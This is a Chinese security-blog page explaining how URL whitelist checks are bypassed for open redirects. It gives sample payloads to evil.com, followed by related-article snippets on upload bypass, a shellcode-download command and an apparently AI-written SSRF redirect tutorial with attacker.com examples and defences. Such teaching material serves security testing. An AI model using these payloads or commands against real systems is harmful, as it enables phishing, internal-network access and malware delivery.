利用URL特性绕过域名白名单检测

最新推荐文章于 2025-06-14 05:27:40 发布
原创 最新推荐文章于 2025-06-14 05:27:40 发布 · 1.1w 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#url跳转

本文探讨了URL跳转漏洞的几种常见攻击手法,包括使用特殊字符绕过防护机制,如'@','','?','#'等,并分析了这些手段如何影响到URL白名单检测,适用于多种应用场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以URL跳转举例:URL跳转漏洞主要是利用浏览器对URL特性的支持,绕过一些正则匹配不严谨的防护。

1.“@”
http://www.target.com/redirecturl=http://whitelist.com@evil.com

2.“\”
http://www.target.com/redirecturl=http://evil.com\a.whitelist.com

3.“?”
http://www.target.com/redirecturl=http://evil.com?a.whitelist.com

4.“#”
http://www.target.com/redirecturl=http://evil.com#a.whitelist.com

以上问题不单单会影响URL跳转漏洞的防护,只要涉及到对URL白名单检测的地方都可能存在此问题,比如:微信、QQ等对聊天内容中对URL的检测;检测文章/论坛帖子等中是否插入了外部图片;[远程]文件包含/读取;等等

基于t.cn生成的短链接绕过白名单方案
Soujer
04-29 702
晓杰以前做绿标短网址研究过相关的防洪技术,如今将一一公布相关技术源码,对你有用的话欢迎关注我!
【漏洞挖掘】——78、白名单检测绕过
Fly_鹏程万里
06-12 376
从以上代码中可以看到此处对文件的Type进行了检查,只允许image/jpeg、image/png、image/gif三种格式,而且直接为服务器端校验,对于服务端的这种校验方式我们可以通过BP抓包来更改content-Type为其允许的类型即可。这里采用白名单判断,但是$img_path直接拼接,所以可以先上传一个符合白名单检测的jpg文件之后在BP中使用%00截断保存路径即可绕过检测,最后保存一个php类型的木马文件。采用白名单检查而且这里的保存路径直接拼接可以使用0x00截断来绕过
网络安全防护:URL跳转漏洞
最新发布
xike1024的博客
06-14 1404
URL跳转漏洞:攻击者利用此漏洞诱使用户访问恶意网站,从而实施钓鱼攻击、恶意软件传播或窃取敏感信息
SSRF绕过域名白名单的一种方式——CVE-2024-24806(影响大量nodejs服务)
ooooooih的博客
04-29 1747
挖SRC也有一段时间了,除了逻辑漏洞就是XSS,感觉没啥提升的样子(叠甲:没有瞧不起逻辑漏洞的意思,我挖得最多的就是逻辑!!),所以最近空闲时间去看了看历史的CVE报告,学习一下大佬们的思路的技巧,前段时间看到一个很有意思的漏洞,分享一下。
绕过应用程序白名单技巧
hl1293348082的专栏
03-28 1537
在内网渗透中,经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况,很多时候是由与安全软件做了白名单限制,只允许指定的白名单中的应用程序启动,这时我们就需要利用白名单中的程序做我们想做的事情,执行我们想要执行的程序,下面就给大家分享几个绕过白名单执行应用程序的姿势。 一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf
关于绕过域名(ip)校验的一些小知识
weixin_30955341的博客
12-04 1792
这篇文章最开始只是想写一个关于绕过referer的方法,写着写着发现和ssrf以及url跳转的一些手法类似,于是把这两种也加上了 对referer做校验一般是对csrf进行防范的手段之一,但是很多时候不经意间还会增加其他攻击的难度,如xss,jsonp劫持等等。 这里对referer的绕过做一个小的总结:目标网站是:www.domain.com 攻击者的域名是:evil.com ...
上传验证绕过——服务端白名单绕过
Williamanddog的博客
01-28 1830
文件上传验证绕过的服务的白名单绕过方式,MIME类型检测绕过和%00截断绕过
文件上传漏洞-白名单检测
dkxkl1314的博客
04-19 1043
上传一张图片与上传一个自己构造的后缀,如果只能上传图片不能上传其它后缀文件,说明是白名单检测。可以利用00截断的方式进行绕过,包括%00截断与0x00截断。
URL跳转漏洞的一些常用绕过方法
Sys1em32 安全之路
12-13 2712
对各种绕过方法做一个汇总,方便自己使用查找。 https://aaa.com/xx?Url=http://www.test.com 文章中test为跳转网站示例,aaa为本身的域名 0x01.利用问号绕过 http://www.aaa.com/acb?Url=http://test.com?login.aaa.com test.com为你要跳转域名,后面跟上网站自身的域名 0x0...
关于Angularjs中跨域设置白名单问题
10-18
然而,为了实现前后端分离或者API调用,开发者常常需要绕过这一限制。在AngularJS中,我们可以利用JSONP(JSON with Padding)或者CORS(Cross-Origin Resource Sharing)这两种方式来实现跨域请求。 对于JSONP,它...
不安全文件下载与上传之——上传漏洞之——路径/扩展名绕过之——黑名单白名单绕过
温柔小薛的博客
04-06 1339
黑名单绕过 (这标题也忒长了点了) 大家谁懂那个如何针对 php和windows环境的叠加绕过文件上传 (不是DATA,是另一个特性) 这个绕过 进行一些防御呢 文件大小写 改变大小写 防御:统一转换为小写 名单绕过 比如黑名单里没有.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|...
通过DNS响应欺骗来绕过域控制验证
weixin_34218890的博客
09-15 635
本文讲的是通过DNS响应欺骗来绕过域控制验证, 在用户验证他们有域名控制权后,Detectify才会扫描这个网站。其中一个验证方法是向域添加一个DNS TXT记录,其中包含由Detectify提供的字符串。当用户进行验证时,Detectify将执行DNS查询并检查相应字符串。让我们来看看它是如何通过 DNS 响应欺骗来绕过域控制验证。 译者注:Dete...
绕过Android域名白名单校验的方法
键盘的起始页
02-24 996
而AbstractHierarchicalUri又是继承自Uri,所以很容易想到,通过反射调用HierarchicalUri这个私有构造函数,传入构造好的 authority 和 path, 创建一个任意可控的Uri实例。然而,对于第一个链接,浏览器会自动把反斜杠 "\" 纠正为正斜杠 "/"对于第二个链接,反斜杠 "\" 会以 URL 编码形式保留而无法触发方法1。事实上,有大量的开发者因为不了解这个性质,认为传入的 url 已经是”正常“通过。,才是被攻击的 Activity 拉起的实际地址。
白名单绕过(%00截断)全网都不会详细讲解的截断原理
m0_58351659的博客
04-01 9469
白名单绕过(%00截断)
深入浅出带你了解文件上传白名单绕过
qq_44005305的博客
01-02 2717
今天比较详细的讲了文件上传白名单绕过原理以及应用方法,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉。
【挖洞经验】url重定向
Fly_鹏程万里
12-20 2871
 url重定向绕过方式   俗话说的好,上有政策,下有对策,url重定向的绕过姿势也越来越多样化。普通url重定向方法测试不成功,换个姿势,说不定可以再次绕过。   这里总结下成功的绕过方式。 (1)      使用#或者@或者?或者\来绕过   这个是比较常见的绕过方式,利用程序或者浏览器对这些特殊符号的解析,可以让url重定向到我们指定的地址。不过,大部分的开发已经注意到了这点,已经做...
web安全第六天:绕过白名单监测实现文件上传
cc777777777的博客
02-27 5778
web安全第六天:绕过白名单监测实现文件上传
web黑名单验证绕过
weixin_34252090的博客
12-18 653
window下除了空格小数点可以绕过还可以利用nfsads数据流来绕过 转载于:https://blog.51cto.com/0x007/1591347
最新绕过目标域名CDN进行信息收集技术
Ms08067安全实验室
07-17 146
点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》五折购买链接:u.jd.com/3ibjeF6绕过目标域名CDN进行信息收集1.CDN简介及工作流程CDN(Content Delivery Network,内容分发网络)的目的是通过在现有的网络架构中增加一层新的Cache(缓存)层,将网站的内容发布到最接近用户的网络“边缘”的节点,使用户可以就近取得所需的内容,提高用...
ssrf的域名重定向绕过
03-21
<think>嗯,用户想了解SSRF漏洞中通过域名重定向绕过防御的技术。首先,我需要回忆一下SSRF的基本概念,以及常见的绕过方法。记得SSRF是攻击者让服务器发起请求到内部或其他受限制的资源,而域名重定向可能用于绕过服务端的过滤机制。 用户提到的域名重定向绕过,可能涉及利用服务端在处理URL时的某些特性,比如允许重定向到内网IP或域名。比如,攻击者可能先提供一个合法的外网URL,但这个URL最终重定向到内网地址,从而绕过黑名单或白名单检查。 根据引用[2],SSRF结合重定向漏洞可以绕过白名单过滤。例如,如果服务器允许用户控制的参数进行重定向,攻击者可以构造一个URL,先指向允许的域名,然后重定向到目标内网地址。需要详细说明这种攻击的具体步骤,比如如何构造这样的URL,以及服务端在处理时的流程。 另外,引用[3]提到SSRF利用服务端发起请求的特点,可以访问内部系统。结合重定向,攻击者可能利用HTTP 302跳转,将初始请求指向合法地址,但实际重定向到内网。比如,攻击者控制一个网站,当服务器请求该网站时,返回302跳转到内网IP,从而绕过直接请求内网的限制。 还需要考虑DNS重绑定技术,这可能与域名重定向有关。攻击者可能配置域名在短时间内解析到不同的IP,第一次解析为合法IP,第二次解析为内网IP,从而绕过检查。这需要服务端在处理请求时不重新验证解析后的IP是否在黑名单中。 另外,引用[1]提到更改IP写法,比如使用十六进制或八进制格式,但这里用户关注的是域名重定向,所以可能需要分开讨论。不过,某些情况下,域名解析到非常规IP格式可能也有帮助,但主要应集中在重定向流程上。 要确保回答涵盖技术原理、具体方法、示例和防御措施。例如,攻击者构造一个重定向链接,服务端在第一次请求时检查通过,但重定向后的请求不再检查,导致访问内网。需要验证这种场景是否可行,以及如何实现。 可能还需要提到如何检测和防御这类攻击,比如服务端应禁止跟随重定向,或者在每次重定向后再次进行过滤检查。同时,使用白名单时,不仅要检查初始URL,还要检查重定向后的URL是否符合要求。 总结步骤:1. 攻击者提供恶意URL,该URL会返回302跳转到内网地址。2. 服务端请求该URL,获得302响应。3. 服务端跟随重定向,请求内网地址,导致SSRF成功。防御方法是禁用自动重定向或对重定向后的地址进行严格校验。</think>### SSRF漏洞中域名重定向绕过技术解析 SSRF(服务器端请求伪造)漏洞常被用于绕过网络边界限制,攻击者通过构造特殊请求使服务端发起非预期请求。**域名重定向**是绕过SSRF过滤的重要手段之一,其核心原理是**利用服务端对重定向目标的二次请求缺乏验证**。 --- #### 一、技术原理 1. **HTTP重定向机制** 当服务端请求一个URL时,若该URL返回`302`或`301`状态码并指定`Location`头,服务端可能自动跳转到新地址。若跳转后的地址是内网IP或受限域名,且服务端未对重定向后的地址二次过滤,则攻击成功[^2]。 2. **绕过逻辑** - 攻击者提供一个合法的外网URL(如`http://example.com/redirect`),该URL返回重定向到内网地址(如`http://192.168.1.1`)。 - 服务端在首次请求时检查外网URL合法,但未对重定向后的地址进行二次校验[^3]。 --- #### 二、具体方法 1. **直接重定向绕过** - 构造一个可控的HTTP服务,返回`302`跳转到目标内网地址: ```http GET /malicious-path HTTP/1.1 Host: attacker.com Location: http://192.168.1.1/admin ``` - 服务端请求`attacker.com/malicious-path`后自动跳转到内网地址。 2. **结合开放重定向漏洞** - 利用目标站点已有的开放重定向漏洞(如`https://victim.com/redirect?url=http://192.168.1.1`),将SSRF请求指向该漏洞接口[^2]。 3. **DNS重绑定(高阶绕过)** - 配置域名解析记录,首次解析为合法IP,后续解析为内网IP(如TTL设为0)。服务端在首次请求时通过校验,但实际访问时解析到内网地址[^1]。 --- #### 三、示例场景 假设服务端存在以下SSRF漏洞代码: ```python import requests def fetch_url(url): response = requests.get(url, allow_redirects=True) # 默认允许重定向 return response.content ``` 攻击者可构造: ```plaintext fetch_url("http://attacker.com/redirect-to-internal") ``` 其中`attacker.com/redirect-to-internal`返回: ```http HTTP/1.1 302 Found Location: http://192.168.1.1/secrets ``` --- #### 四、防御措施 1. **禁用自动重定向** 在代码中设置`allow_redirects=False`(如Python的`requests`库)。 2. **二次校验重定向地址** 对`Location`头中的地址进行黑名单/白名单过滤。 3. **强化DNS解析策略** 禁止使用非常规DNS解析(如短TTL域名)[^1]。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值